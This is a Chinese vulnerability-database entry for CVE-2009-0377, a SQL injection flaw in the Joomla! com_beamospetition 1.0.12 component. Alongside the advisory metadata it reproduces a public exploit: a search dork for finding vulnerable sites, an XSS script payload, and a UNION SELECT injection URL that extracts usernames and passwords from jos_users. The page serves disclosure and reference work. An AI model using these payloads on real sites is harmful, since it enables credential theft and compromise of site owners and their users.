Joomla! com_beamospetition组件 SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117270 漏洞类型 SQL注入
发布时间 2009-01-21 更新时间 2009-02-02
CVE编号 CVE-2009-0377 CNNVD-ID CNNVD-200902-002
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7847
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-002
|漏洞详情
Joomla!是一款开放源码的内容管理系统(CMS)。Joomla!的com_beamospetition组件实现上存在输入验证漏洞,远程攻击者可能利用此漏洞实现SQL注入执行攻击。攻击者可以利用这些漏洞窃取认证信息或获取对应用的控制。
|漏洞EXP
Joomla component beamospetition 1.0.12 Sql Injection / Xss

Author : vds_s

Dork : "Powered by beamospetition 1.0.12"

Dl : http://joomlacode.org/gf/project/beamospetition/

Xss : http://[site]/?option=com_beamospetition&func=sign&pet='><script>alert('Xss')</script>

Sql Injection : http://[site]/?option=com_beamospetition&func=sign&mpid=-9999'%20union%20select%200,1,username,password,4,5,6,7,8,9,10,11,12,13,14,15%20from%20jos_users/* 

# milw0rm.com [2009-01-21]
|参考资料

来源:BID
名称:33391
链接:http://www.securityfocus.com/bid/33391
来源:BUGTRAQ
名称:20090121Joomlacomponentbeamospetition1.0.12SqlInjection
链接:http://www.securityfocus.com/archive/1/archive/1/500250/100/0/threaded
来源:MILW0RM
名称:7847
链接:http://www.milw0rm.com/exploits/7847